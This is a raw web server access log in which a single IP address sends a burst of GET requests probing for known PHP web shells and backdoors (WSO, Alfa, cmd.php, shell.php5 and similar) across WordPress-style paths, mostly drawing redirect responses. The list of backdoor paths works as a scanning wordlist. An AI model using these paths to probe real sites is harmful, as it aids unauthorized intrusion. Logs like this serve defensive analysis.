194.5.82.85 - - [20/Dec/2025:15:25:39 -0500] "GET /wp-includes/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:40 -0500] "GET /wp-includes/css/dist/widgets/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:40 -0500] "GET /wander.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:41 -0500] "GET /assets/as.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:42 -0500] "GET /wp-admin/images/install.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:42 -0500] "GET /wp-content/radio.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:42 -0500] "GET /blog/fw.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:42 -0500] "GET /alfanew.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:43 -0500] "GET /admin.php?fm=true HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:41 -0500] "GET /wp-content/themes/wp-pridmag/classwithtostring.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:41 -0500] "GET /wp-admin/shapes.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:42 -0500] "GET /wp_wrong_datlib.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:43 -0500] "GET /plugin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:43 -0500] "GET /wp-crom.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:43 -0500] "GET /al.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:44 -0500] "GET /simple/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:44 -0500] "GET /uploxe.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:45 -0500] "GET /wp-includes/images/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:45 -0500] "GET /l.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:46 -0500] "GET /wp-content/defaults.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:46 -0500] "GET /wp-admin/css/colors/blue/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:25:46 -0500] "GET /filemanager/dialog.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:47 -0500] "GET /.well-known/pki-validation/nxc.php HTTP/1.1" 302 771 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:25:47 -0500] "GET /i.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:47 -0500] "GET /man.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:48 -0500] "GET /wp/wp-content/themes/twentytwentyfive/wpc.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:48 -0500] "GET /plugins.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:49 -0500] "GET /test.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:50 -0500] "GET /st.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:25:43 -0500] "GET /ee.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:44 -0500] "GET /images/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:44 -0500] "GET /login.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:44 -0500] "GET /wp-cron.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:25:45 -0500] "GET /core.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:45 -0500] "GET /wp-content/plugins/not/includes/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:45 -0500] "GET /pvafcbhg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:46 -0500] "GET /wp-includes/certificates/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:46 -0500] "GET /cmd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:47 -0500] "GET /batm.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:47 -0500] "GET /wp-content/uploads/2018/12/wso.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:48 -0500] "GET /moddofuns.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:25:48 -0500] "GET /as/function.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:25:48 -0500] "GET /wp-includes/Requests/library/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:49 -0500] "GET /gfile.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:49 -0500] "GET /file.php?fm=true HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:49 -0500] "GET /.well-known/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:49 -0500] "GET /alfanew.PHP7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:50 -0500] "GET /config.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:50 -0500] "GET /img/nxc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0" 194.5.82.85 - - [20/Dec/2025:15:25:50 -0500] "GET /f.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:25:51 -0500] "GET /wp-admin/wp-admins.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:51 -0500] "GET /akc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:25:52 -0500] "GET /wp-admin/maint/wp-damin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:52 -0500] "GET /wp-content/plugins/apikey/1.php?f=f HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:25:52 -0500] "GET /alfanew2.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:53 -0500] "GET /go.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:53 -0500] "GET /.well-known/fierzashell.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:54 -0500] "GET /wp-content/plugins/ss.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:54 -0500] "GET /signup.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:54 -0500] "GET /wp-lock.php?fm=true HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:54 -0500] "GET /beence.php/wp-admin/images/Mhbgf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:55 -0500] "GET /7.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:25:55 -0500] "GET /wp-includes/theme-compat/chosen.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0" 194.5.82.85 - - [20/Dec/2025:15:25:55 -0500] "GET /wp-content/plugins/wp-theme-editor/include.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:55 -0500] "GET /post.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:25:56 -0500] "GET /wp-content/style-css.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:56 -0500] "GET /we.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0)" 194.5.82.85 - - [20/Dec/2025:15:25:56 -0500] "GET /lock.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:25:57 -0500] "GET /server.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:57 -0500] "GET /yox.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:50 -0500] "GET /upload/JustBrain.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3" 194.5.82.85 - - [20/Dec/2025:15:25:51 -0500] "GET /c.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:51 -0500] "GET /wp-signup.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:25:51 -0500] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:52 -0500] "GET /wp-admin/wp-admin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:25:52 -0500] "GET /adin.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:53 -0500] "GET /alf.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:25:53 -0500] "GET /wp-content/lock11.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:53 -0500] "GET /wso2.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:54 -0500] "GET /user-new.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:25:55 -0500] "GET /jp.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:56 -0500] "GET /wp-content/nxc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:25:56 -0500] "GET /nakrip.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0" 194.5.82.85 - - [20/Dec/2025:15:25:57 -0500] "GET /wp-includes/css/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0" 194.5.82.85 - - [20/Dec/2025:15:25:57 -0500] "GET /wp-includes/style-engine/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:58 -0500] "GET /wp-admin/js/widgets/about.php7 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:58 -0500] "GET /wp-includes/customize/wp-conflg.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:59 -0500] "GET /wp-includes/404.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:59 -0500] "GET /css/cloud.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:59 -0500] "GET /wp-content/plugins/pwnd-1/pwnd.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:00 -0500] "GET /0x.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:57 -0500] "GET /8.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:58 -0500] "GET /wp-includes/widgets/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:58 -0500] "GET /file.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:25:58 -0500] "GET /wp-content/wp-conflg.php?p=/wp-content/themes/too.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:25:59 -0500] "GET /wp-includes/Requests/src/Requests.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Linux i686; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:25:59 -0500] "GET /wp-content/themes/wp-pridmag/up.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:00 -0500] "GET /alfashell.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:00 -0500] "GET /wp-admin/wp-conflg.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0" 194.5.82.85 - - [20/Dec/2025:15:26:01 -0500] "GET /jquery.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:02 -0500] "GET /wp-admin/user/about.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:26:02 -0500] "GET /wp-content/themes/user-new.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:02 -0500] "GET /upload/upload.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:03 -0500] "GET /wp-content/themes/pridmag/alfa.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:03 -0500] "GET /wp-includes/Requests/about.php?p= HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:04 -0500] "GET /wp-includes/random_compat/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:04 -0500] "GET /themes/zMousse/otuz1.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:77.0) Gecko/20100101 Firefox/77.0" 194.5.82.85 - - [20/Dec/2025:15:26:05 -0500] "GET /shell.php5 HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0" 194.5.82.85 - - [20/Dec/2025:15:26:05 -0500] "GET /wp-includes/js/tinymce/plugins/wptextpattern/about.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:05 -0500] "GET /g.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0" 194.5.82.85 - - [20/Dec/2025:15:26:05 -0500] "GET /wp-loccs.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Safari/537.36" 194.5.82.85 - - [20/Dec/2025:15:26:00 -0500] "GET /.well-known/acme-challenge/xmrlpc.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95" 194.5.82.85 - - [20/Dec/2025:15:26:01 -0500] "GET /wp-includes/SimplePie/HTTP/Parser.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" 194.5.82.85 - - [20/Dec/2025:15:26:01 -0500] "GET /khgdl.php HTTP/1.1" 301 795 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; rv:11.0) like Gecko" 194.5.82.85 - - [20/Dec/2025:15:26:01 -0500] "GET /asus.php HTTP/1.1" 301 795 "-" 